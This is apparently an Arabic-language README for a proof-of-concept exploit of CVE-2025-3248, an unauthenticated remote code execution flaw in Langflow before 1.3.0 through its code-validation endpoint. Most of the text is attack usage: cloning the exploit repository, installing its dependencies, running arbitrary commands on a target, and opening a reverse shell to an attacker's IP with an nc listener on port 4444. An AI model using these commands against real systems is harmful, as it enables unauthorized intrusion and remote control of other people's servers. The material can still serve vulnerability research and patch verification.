
PoC لـ CVE-2025-3248: تنفيذ تعليمات برمجية عن بُعد (RCE) بدون مصادقة في Langflow < 1.3.0 عبر /api/v1/validate/code.
استغلال لإثبات المفهوم يوضح ثغرة تنفيذ تعليمات برمجية عن بُعد في نقطة التحقق من الكود في Langflow. تؤثر هذه الثغرة على إصدارات Langflow الأقدم من 1.3.0، مما يسمح للمهاجمين غير المصادق عليهم بتنفيذ تعليمات برمجية عشوائية عبر طلبات HTTP معدّة بعناية.
/api/v1/validate/coderequestscoloramagit clone https://github.com/preemware/langflow-exploit
cd langflow-exploit
pip install requests colorama
يدعم الاستغلال وضعين للتشغيل:
تنفيذ أمر واحد على النظام المستهدف:
python3 cve-2025-3248.py cmd <target_url> "<command>"
مثال:
python3 cve-2025-3248.py cmd http://target:7860 "id"
تشغيل صدفة عكسية تفاعلية:
nc -lvnp 4444
python3 cve-2025-3248.py shell <target_url> <your_ip> <your_port>
مثال:
python3 cve-2025-3248.py shell http://target:7860 10.0.0.5 4444